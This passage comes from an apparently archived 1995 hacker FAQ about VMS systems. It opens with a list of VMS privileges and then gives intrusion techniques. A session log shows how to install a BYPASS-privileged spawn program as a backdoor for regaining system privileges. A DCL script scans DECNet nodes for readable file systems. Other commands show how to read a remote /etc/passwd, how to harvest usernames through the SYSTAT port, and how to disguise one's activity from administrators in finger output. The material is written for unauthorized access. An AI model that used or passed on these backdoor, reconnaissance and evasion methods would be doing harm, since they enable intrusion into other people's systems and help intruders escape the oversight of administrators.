                device by executing the Allocate Device ($ALLOC) system
                service or by users the DCL command "ALLOCATE"

ALTPRI    -     Allows the user's process to
                1.  Increase its own priority
                2.  Set the base priority of a target process
                3.  Change priority of its batch or print jobs.

AUDIT     -     Allows software to append to audit records to the system
                security audit log file.   As a result,  this privilege
                permits the logging of events that appear to come from the
                operating system

BUGCHK    -     Allows the process to make bugcheck error log entries
                from users,  supervisor, or compatibility mode or to send
                messages to the system error logger.

BYPASS    -     Allows the user's process full access to all protected
                objects,  totally bypassing UIC-based protection,
                ACL protection (Access Control List) and mandatory
                access controls.   Users with this privilege can
                modify authorization records (SYSUAF.DAT,  where
                usernames/passwords are stored),  rights identifiers
                (RIGHTSLIST.DAT), DECNet object passwords and accounts
                (NETOBJECT.DAT),  and unlimited file access.

CMEXEC    -     Allows the user's process to execute the Change Mode to
                Executive system service.

CMKRNL    -     Allows the user's process to execute the Change Mode to
                Kernel system services.   These privileges allow
                things like modify a multiprocessor operation (START/
                CPU,  STOP/CPU type commands),  modifying the system
                rights list (SET RIGHTS/ATTRIBUTE), change a processes
                UIC (SET UIC),  and other functions.

DETACH    -     Processes can create detached processes that have there
                own UIC without the DETACH privilege,  provided the
                processes wants to specify a different UIC for the


DIAGNOSE  -     Lets a process run online diagnostic programs and intercept
                and copy all messages written to the error log file.

DOWNGRADE -     Permits a process to manipulate mandatory access controls.

EXQUOTA   -     Allows the space taken by the user's files on a given
                disk volumes to exceed any usage quotas set for the user
                (as determined by UIC) on those volumes.

GROUP     -     Allows the user's process to affect other processes in its
                own group.

GRPNAME   -     Lets the user's process bypass  access controls
                and insert names into (and delete from) the logical table
                of the group to which the process belongs by the use of the
                Create Logical Bane and Delete Logical Name system services.

GRPPRV    -     When the process's group matches the group of the object
                owner,  the GRPPRV privilege gives a process the access rights
                provided by the object's system protection field.  GRPPRV
                also lets a process change the protection or the
                ownership of any object whose owner group matches the
                process's group by using the DCL commands SET SECURITY

IMPORT    -     Lets a process manipulate mandatory access controls.  The
                privilege lets a process mount unlabeled tape volumes.
                This privilege is reserved for enhanced security products
                like SEVMS.

LOG_IO    -     Lets the user's process execute the Queue I/O request
                ($QIO) system service to perform logical-level I/O
                operations.

MOUNT     -     Lets the user's process execute the mount volume QIO
                function.

NETMBX    -     lets a process perform functions related to a DECNet
                Computer Network.

OPER      -     Allows a process to use the Operator Communications
                Manager (OPCOM) process to reply to user's request,
                to broadcast messages to all terminals logged in,  to
                designate terminals as operator terminals and specify
                the types of messages to be displayed to these operator's
                terminals,  and to initialize and control the log file
                of operator's messages.

PFNMAP    -     Lets a user's process create and map page frame number
                (PFN) global sections to specific pages of physical
                memory or I/O device registers,  no matter who is using
                the pages or registers.

PHY_IO    -     Lets the user's process execute the Queue I/O request
                ($QUI) system service to perform physical-level I/O
                operations.

PRMCEB    -     Lets the user's process create or delete a permanent
                common even flag cluster by executing the Associate
                Common Event Flag Cluster.

PRMGBL    -     Lets the user's process create or delete permanent
                global section by executing the Create and Map Section
                or Delete Global Section system service.  In addition
                ,  a process with this privilege (plus CMKRNL and SYSGLB
                privileges) can use the Install utility (INSTALL)

PRMMBX    -     Lets user's process create or delete permanent mailbox
                by the Create Mailbox and Assign Channel system service
                or the DElete Mailbox system service.   Mailboxes are
                buffers in virtual memory that are treated as if they were
                record oriented I/O devices.  A mailbox is used for
                general interprocess communications.

PSWAPM    -     Lets the user's process control whether is can be
                swapped out of the balance set by executing the
                Set Process Swap Mode system service.

READALL   -     Lets the process bypass existing restrictions that would
                otherwise prevent the process from reading an object.
                Unlike the BYPASS privilege which will permits writing and
                deleting,  READALL permits only the reading of objects
                and allow updating of such backup-related file
                characteristics as the backup date.

SECURITY  -     Lets a process perform security related functions such
                as modifying the system password with the DCL command
                SET PASSWORD /SYSTEM or modifying the system alarm
                and auditing settings using the DCL command
                SET AUDIT.

SETPRV    -     Lets user's create process whose privileges are greater
                than its own.   With this privilege,  a user can obtain
                any other privilege via the DCL command "SET PROCESS/
                PRIV"

SHARE     -     Lets process assign channels to devices allocated to other
                processes or to a nonshared device the Assign I/O Channel
                system service.

SHMEM     -     Lets the user's process create global sections and
                mailboxes (permanent or temporary_ in memory shared by
                multiple processors if the process also has appropriate
                PRMGBL,  PRMMBX,  SYSGBL,  and TMPMBX privileges.

SYSGBL    -     Lets user;s create or delete system global sections by
                executing the Create and Map Sections or the Delete
                Global Section system services.  With this privilege
                and CMKRNL and PRMGBL,  the Install command (INSTALL)
                can be used.

SYSNAM    -     Let's user's process bypass discrepancy access
                controls and insert names into the system logical
                name table and delete names from that table.  A
                process with this privilege can use the DCL commands
                ASSIGN and DEFINE to add names to the system logical
                in the user or executive mode and can use the DEASSIGN
                command in either mode to delete names from the
                table.

SYSPRV    -     Lets a process access security objects by the system
                protection field and also read and modify the owner
                (UIC),  the UIC-based protection code,  and the ACL
                of and object.   Any processes with this privilege
                can add,  modify,  or delete entries in the system
                user authorization file (SYSUAF.DAT)

TMPMBX    -     Lets user's create process create a temporary mailbox
                by executing the Create Mailbox and Assign Channel.

UPGRADE   -     Lets a process manipulate access controls.  This privilege
                is reserved for enhanced security products like SEVMS.

VOLPRO    -     Lets user's processes:
                        o Initialize a previously used volume with an owner
                          UIC different from the user's own UIC.
                        o Override the expiration date on a tape or
                          disk owned by another user.
                        o Use the ////FOREIGN qualifier to mount a Files-11
                          volume owned by another user.
                        o Override the owner UIC protection of volume.

WORLD     -     Lets user's process affect (suspend, resume, delete,
                set priority, wake,  etc) other processes both inside
                and outside its group.


                                - Taken Mostly From the, "OpenVMS VAX
                                  System Security" (V6.0)



2.      "How can I make a SUID Shell in VMS"....

        Simple...  You can't.   Privileges are handled in a much different
        method than on Unix (see "How are user privileges setup").  You
        can make a program (image) that when executed,  the process
        of that image gains the privileges that it was "installed"
        with.    For example,  if you write a program that needs read access
        to the SYSUAF.DAT you *could* make SYSUAF.DAT world readable
        (if you are on a privileged account,  of course)  but this
        would be very,  very unwise.    Another method would be to
        "INSTALL" the executable image and give it READALL privileges,
        so that when a user's processes calls your programs,  that programs
        process (the image running) gets READALL privileges.   Then that
        process would be able to read the SYSUAF.DAT,   but the user's
        process would not.

        With this in mind,   it is possible to create a senerio similar
        to that of a "SUID Shell" (but without the shell).  The idea
        is to give the privileges (that you want to keep ahold of)
        on a program that does nothing more than make a call to
        LIB$SPAWN.   The idea is to write a program that will do nothing
        more than create another process (that drops you to DCL)
        via LIB$SPAWN,  and using the VMS "INSTALL" utility,  give it
        the privileges that you wish that process to have.  There are
        several downfalls to this.  To accomplish this,  you would
        need CMKRNL privileges yourself (your process).  So your process
        would already need certain privileges to pull this off. The idea
        here is in the event that the user has obtained a "privileged
        account",  and wishes to remain privileged,  he/she could
        install a image which could be called by a normal (non-privileged)
        user in which he/she could obtain the system privileges again.

        Below is a sample session capture of me installing a privileged
        image.   The privilege I gave this image is "BYPASS" (Bypass
        all security features,  and the ability to modify SYSUAF.DAT
        and RIGHTSLIST.DAT)


Trying...
Connected to UpperDck
Escape character is '^]'.

                       Upper-Dck VMS Development System



Username: SYSTEM   ! Login to our privileged account
Password:
        Welcome to VAX/VMS version V5.2 on node UPPERDCK
    Last interactive login on Friday,  6-JAN-1995 07:17
    Last non-interactive login on Thursday, 22-DEC-1994 15:51

 User= SYSTEM       Directory= [SYSMGR]       UIC=  [1,4]
        Terminal= NTY5:       6-JAN-1995 07:19:01.00

sysm>basic      ! I am going to use VMS BASIC,  but use anything you want

VAX BASIC V2.3


Ready

10 external long function lib$spawn ! Call "SPAWN" library.  The idea with this
   declare long xspawn              ! program is to give us another "spawned"
   xspawn=lib$spawn()               ! process.

save mytrap             ! Save this program
Ready

exit                    ! and exit the VMS BASIC.
sysm>basic mytrap*.*    ! Just to show our file.

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1

Total of 1 file.
sysm>basic mytrap       ! This will compile and make our object code
sysm>dir mytrap*.*      ! To show our object code.

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        MYTRAP.OBJ;1

Total of 2 files.

sysm>link mytrap/notraceback  ! Link it, with notraceback (for priv reasons)
sysm>dir mytrap*.*            ! To show our executeable code.

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        MYTRAP.EXE;1        MYTRAP.OBJ;1

Total of 3 files.

sysm>copy mytrap.exe sys$system:  ! copy it to sys$system: [this is silly]
sysm>install                      ! Run install to setup priv's on our imagine.
INSTALL> create mytrap/priv=(bypass) ! Give "mytrap" bypass priv's
INSTALL> list mytrap/full            ! Just to show off the image priv's

DISK$VAXVMSRL5:<SYS6.SYSEXE>.EXE
   MYTRAP;2                       Prv
        Entry access count         = 0
        Privileges = BYPASS

INSTALL> exit                    ! Get the hell out of here.
sysm>dir sys$system:mytrap.exe   ! And just to show its still there

Directory SYS$SYSROOT:[SYSEXE]

MYTRAP.EXE;2        MYTRAP.EXE;1

Total of 2 files.

sysm>dir sys$system:mytrap.exe;2 /full ! Notice "world" protections...

Directory SYS$SYSROOT:[SYSEXE]

MYTRAP.EXE;2                  File ID:  (43314,33,0)
Size:            4/6          Owner:    [1,4]
Created:   6-JAN-1995 07:20:26.35
Revised:   6-JAN-1995 07:20:41.54 (2)
Expires:   <None specified>
Backup:    <No backup recorded>
File organization:  Sequential
File attributes:    Allocation: 6, Extend: 0, Global buffer count: 0
                    No version limit, Contiguous best try
Record format:      Fixed length 512 byte records
Record attributes:  None
RMS attributes:     None
Journaling enabled: None
File protection:    System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List:  None

sysm>set file sys$system:mytrap.exe /protection=(w:re) ! because world cant
sysm>log                                               ! read/execute. Logout.

  SYSTEM       logged out at  6-JAN-1995 07:42:02.55
Connection closed by foreign host.

        [Now,  we make a new connection to the system to test our ]
        [ "MYTRAP.EXE" with the image priv's attached to it       ]

Trying...
Connected to UpperDck.
Escape character is '^]'.

                       Upper-Dck VMS Development System


Username: JOEBOB        ! Now, log as a normal user.
Password:
        Welcome to VAX/VMS version V5.2 on node UPPERDCK
    Last interactive login on Friday,  6-JAN-1995 07:14

 User= JOEBOB        Directory= [UPPERDCK]       UIC=  [130,163]
        Terminal= NTY6:       6-JAN-1995 07:42:12.00

UPDCK> show process/priv ! To prove that we have normal user priv's

 6-JAN-1995 07:42:27.01   User: JOEBOB           Process ID:   0000010F
                          Node: UPPERDCK         Process name: "JOEBOB"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> set proc/priv=bypass ! To prove I can't enabled "BYPASS" priv's
%SYSTEM-W-NOTALLPRIV, not all requested privileges authorized
UPDCK> mcr mytrap           ! Run our little "privledge provider"
UPDCK> show process/priv    ! To show our priv's after we exec. MYTRAP.EXE
                            ! note that we are spawned (see PID and Proc. Name)

 6-JAN-1995 07:42:46.05   User: JOEBOB           Process ID:   00000110
                          Node: UPPERDCK         Process name: "JOJBOB_1"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> set process/priv=bypass ! Note,  no error when we do this now.
UPDCK> show process/priv       ! To prove that we have gained BYPASS

 6-JAN-1995 07:42:53.37   User: JOEBOB           Process ID:   00000110
                          Node: UPPERDCK         Process name: "JOEBOB_1"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device
 BYPASS               bypasses UIC checking


Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> logout ! I can pretty much do anything now.... Lets stop this subprocess
  Process JOEBOB_1 logged out at  6-JAN-1995 07:42:59.01
UPDCK> logout ! logout completely

  JOEBOB       logged out at  6-JAN-1995 07:43:05.11
Connection closed by foreign host.


             -     Using DECNetwork's to your advantage.     -


1.      "What is a DECNet?"

"DECNet is a collective name for the family of communications products
(software and hardware) that allow DIGITAL operating systems to participate
in a network.

"A DECNet network links computers into flexible configurations to exchange
information,  share resources,  and perform distributed processing.  DECNet
distribution processing capabitlites also information to be originated
anywhere in the network."

                - VMS Version 5.0 DECnet "Guide to DECNet - VAX Networking"

        DECNet can support a minimum of 2 nodes and up to 64,000 nodes,
        and can support multiple OS's along with various LAN/WAN
        (Using PSI,  and DECNet system can be supported on packet
        switching enviroments (like Tymnet and Sprintnet)) and
        operating environments. (VMS,   Ultrix,  RSX, and with the correct
        hardware,  IBM PC's,  VAXmate's, etc).

        DECNet's allow easy access to information from system to system.


2.      "This is great,  what does it mean to me."

        You can use DECNets to grab information/files/programs and use
        them to your own advantage (granted that security has not
        been completely implemented... which is usually the case
        on a vanilla/default install)

        For instance,  if a intruder where to break into a system
        which supported a DECNet,  he/she might be able to access files on
        a remote system/nodes of that DECNet.  As stated,   DECNets
        can range from local machines in that area (LAN) or
        DECNet's can stretch across the world.

3.      "How would I get to that information on a remote node?"

        All from DCL,  using commands like "DIRECTORY",  "COPY",
        "TYPE",  etc.   Usually by adding in the node name at the
        being of the command.  For example

$ DIR NODE::            ! Example format.

        or

$ DIR NODE::SYS$COMMON:[SYSEXE]  ! Shows logical SYS$COMMON and the SYSEXE
                                 ! Directory on the remote node.

        or

$ COPY NODE::DISK1:[BOB]SECRET.TXT []  ! The "[]" means "wherever i am"


4.      "What if I want to connect and use the nodes interactively?".

        One of two ways.  Try to "SET HOST [NODENAME]".  If that fails,
        try to use NCP (Network Control Program),  like this.....

$ MCR NCP CONNECT NODE [NODENAME]

5.      "Well, Gee,  thats wonderful.  How do I find connectable nodes
        that are on the DECNet"

        Once again, this information can be found using the NCP (
        or via a "SHOW NETWORK") command.   You might not get a
        *complete* listing,  because the host you are on might not
        know all DECNet nodes,  but it will at least get you hoping
        around on the DECNet.  This list can be obtain via executing.....

$ MCP NCP SHOW KNOWN NODE

        This will dump a list.  You can sort though the information
        using the NCP connect command,  and see what all sorts
        of things you run into (Xyplex/DECServers,  Other VMS Machines,
        SNA Gateway controls,  etc, etc).  If you are only interested
        in machine that you can get file information on,  you can
        us the following command file to find nodes that you can
        use.



$! DECNETFIND  Version 1.0
$! Coded By The Beaver
$! Jan 5th,  1995
$!
$! The intent of this code is to scan for remote,  connectable nodes that
$! the VMS host knows about (Via NCP) and build a list.  Once this list
$! has been created,  we check to see if the remote machine is indeed
$! A> VMS (Later rev. will include Ultrix/OSF(?)) 2> Can it be directly
$! accessed via the DECNet 3> Can we read file systems on the remote node.
$! Node that are "successful" are stored away.  This prevents mucho
$! time consuming scanning by hand.
$!
$!
$ on error then goto err                        ! In case of Boo-Boo
$ say :== write sys$output
$ if p1 .eqs. ""                                ! Yes, output file helps
$       then
$       say "DECNet VMS Node Finder Version 1.0                   1995"
$       say "Coded By The Beaver"
$       say ""
$       say "Usage:"
$       say "DECNETFIND [Outfile]"
$       exit
$       endif
$!
$ say "Building Node List Via NCP....(Working)"
$!
$ mcr ncp show known nodes to nodes.out  ! Fire up NCP and dump nodeslist
$ open/read in nodes.out                 ! Open to read
$ open/write nodelist 'p1'               ! "Success" Storage area.
$ on severe_error then continue          ! So things done die on "dir ::"'s
$!
$ loop1:
$ read/end = end in line
$       name=f$element(0,")", f$element(1, "(", line)) ! grab a nodename
$       if name .gts. "("
$         then
$         say "**************************************************************"
$         say "Nodename: "+name
$         say ""
$         dir 'name'::          ! See if we can get to it via a DECNet DIR::
$         if $severity .nes "1"
$               then
$               say "Status:  Node Unreachable Via DECNet Dir::"
$               else
$               say "Status:  Found Good Node. [Logged]"
$               write nodelist name             ! Log it.
$               endif
$ endif
$ goto loop1
$ err:
$ say "Ouch.  There has been a error!"
$ end:
$ close in
$ close nodelist                ! Close up and leave,  exit stage
$ delete nodes.out;*            ! right
$ say "Complete!"
$ exit


        "That works great,  but I ran into a Unix (Ultrix) machine,  and
        when I do a 'DIR NODENAME::' it only gives me some jerk-off's
        directory.   Is there anyway I can grab files off the remote machine
        (Ultrix) and directory listings?"

        Once again,  no problem.   Format the command like this:

$ DIR NODE::"/etc"      ! will give remote nodes /etc directory

        Or to grab the /etc/passwd file on the remote node,  try....

$ TYPE NODE::"/etc/passwd"   ! And open a capture buffer.


6.  "Can't DECNet's be protected more against this generic attack?"

        Sure,  by setting up proxy login access,  which forces the
        users to supply a password when attempting to do network
        operations like above.  Proxy logins are formatted below:

        (This example is using the DCL COPY command)

        COPY remotenode"proxyaccount"::filename filename

        for example,

        COPY ADAM"BOB FLASHER2"::SECURITY.TXT MYSECURITY.TXT

        (BOB - The Proxy login name,  FLASHER2 is the password)

        However,  in a vannila VMS (IE - Default installation),
        proxy logins are not enabled,  so DECNet surfing can
        prove to be very,  very useful.

7.  "Are proxy logins logged.. Can I write a routine that will
        attempt proxy accounts to break into remote machines?"

        You bet that proxy logins are logged.   Repeating invalid
        attempts will inform the administrations that a "NETWORK
        BREAK IN" is in effect (via the OPCOM process).


                -       TCP/IP Networked Machines        -


1.  "I have found a remote VMS machines on a TCP/IP network (I.E.
     the internet).   I have tried to finger the remote system in
     order to start collecting usernames,   I get a 'connection
     refused'.... Now what?"

        Connect to the SYSTAT port (Port 11).  This will give jobs
        currently running on the system.  More than likely,  this
        port has been left open.  With this in mind,  you can
        sort though all the jobs and grab usernames,  while excluding
        system jobs (I.E - SWAPPER,  ERRFMT,  AUDIT_SERVER,
        JOB_CONTROL,  NETACP,  EVL,  REMACP,  SYMBIONT*,
        XYP_SERVER,   OPCOM,  INET_SERVERS, etc....etc).

        Also,  I find one great trick is to look for "Student" type
        accounts.  That is,  accounts that appear to be repetitive.
        You can then predict possible usernames.

        The above can be accomplisted by using the below command
        (In most cases):

$ TELNET SITE.ADDRESS.COM /PORT=11


2.      "On Unix machines,  I can make a symbolic link to a 'questionable'
        command,   so that is appears that I am doing one thing when
        I am really doing another (Or copying and renaming the command).
        Is there anyway I can make it appear that I am doing something
        that I am not?".

        When the command "FINGER" is issued,  a user/administrator
        can see what image is currently being executed by a particular
        user.   For example sake,  lets say you want to play with
        NCP but you know that if the administrators see you in NCP,
        they will get rather irate,  and kick you off the system.
        You can make it appear that you are doing something else
        by:

        a>  Copying the image,  renaming it,  and running it. [which
            may or may not work].
        b>  Write a routine that calls LIB$SPAWN named the command
            you wish to appear to be executing,   thus making it
            appear via finger that you are executing another command.

        Below is a quick example session to examine of senerio b. :

-----------------------<Begin Log Of Session>------------------------------
Trying...
Connected to UpperDck.
Escape character is '^]'.

                       UpperDck VMS Development System


Username: JOEUSER
Password:
        Welcome to VAX/VMS version V5.2 on node UPPERDCK
    Last interactive login on Friday, 20-JAN-1995 12:58

 User= JOEUSER      Directory= [JOEUSER]       UIC=  [JOEUSER]
        Terminal= NTY12:      20-JAN-1995 13:00:16.93

$ create mail.bas
10 external long function lib$spawn  ! Create a program that calls LIB$SPAWN
   declare long xspawn               ! This can be coded in anything you
   xspawn=lib$spawn()                ! want
<CRTL-Z>
$ basic mail                         ! Compile out LIB$SPAWN program
$ link mail                          ! Link it.
$ finger                             ! Show what we look like before we run it
20 JAN 13:02:06    Up 28 21:15:12
2+0 Jobs   Load ave  0.07 0.03 0.01

Login   Name                 Job   Subsys  TTY     Idle  Net Site
JOEUSER JOEUSER              0013d FINGER  nty12         UPPERDCK
OPER    Operations           0013a GLYPH   nty9     40   OPSITE

$ run mail      ! Makes us appear as if we are in the "MAIL" utility.
$ finger        ! Take a look'see
20 JAN 13:02:15    Up 28 21:15:21
2+0 Jobs   Load ave  0.07 0.03 0.01

Login   Name                 Job   Subsys  TTY     Idle  Net Site
JOEUSER JOEUSER              0013d MAIL    nty12         UPPERDCK
OPER    Operations           0013a GLYPH   nty9     40   OPSITE

$ log  ! Stop the subprocess
  Process JOEUSER_1 logged out at 20-JAN-1995 13:02:20.02
$ log  ! logout
  JOEUSER        logged out at 20-JAN-1995 13:02:22.32

-----------------------------<End Of Log>--------------------------------



Finnal Notes:

        This FAQ is far from complete,  and will remain in its "beta"
        stages for sometime.

        I am sure that many people while question the fact of the us
        of VMS BASIC as opposed to C.    The reason that some examples
        where given with VMS BASIC is because of a lack of a C compiler
        on our local machine.   Besides,  it gets the job done
        (sloppy).

        I was mailed many terminal spoofing programs,  but since the
        range on these can be so large,  and its one of the most
        common VMS hack's,  I will wait until the next release of this
        FAQ until a good terminal spoofing is released with this
        (Anyone ever thought of grabbing the SYS$ANNOUNCE to emulate
        the login screen??).

        I got alot of mail from alot of people.

        Thanks to Shadow Hacker,   Risc,   Trouser,  Spoon,  and
        all the boys at The Upper-Deck.

        Bitwarrier for intresting conversation (besides terminal
        spoofing),  the ton of people that mailed me.  Thanks.

        - Things that need to be added/updates:

          Identifying VMS machines.....
          Information on the OPCOM process....
          Information on accounting/user tracking...
          A decent terminal spoof program

        - This that we are looking for [Please mail beaver@upperdck.blkbox.
          com,  if you know about these hack's]

          VMS Phone mail recording facility (Uses undocumented routines
          found in the PHONE.EXE command)

          Passing commands via VMS mail.

        If you have anything remotely intresting for the next release,
        please mail them to me at:

        beaver@upperdck.blkbox.com

        "It ain't done,  but hey... It a fucking start......"




TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH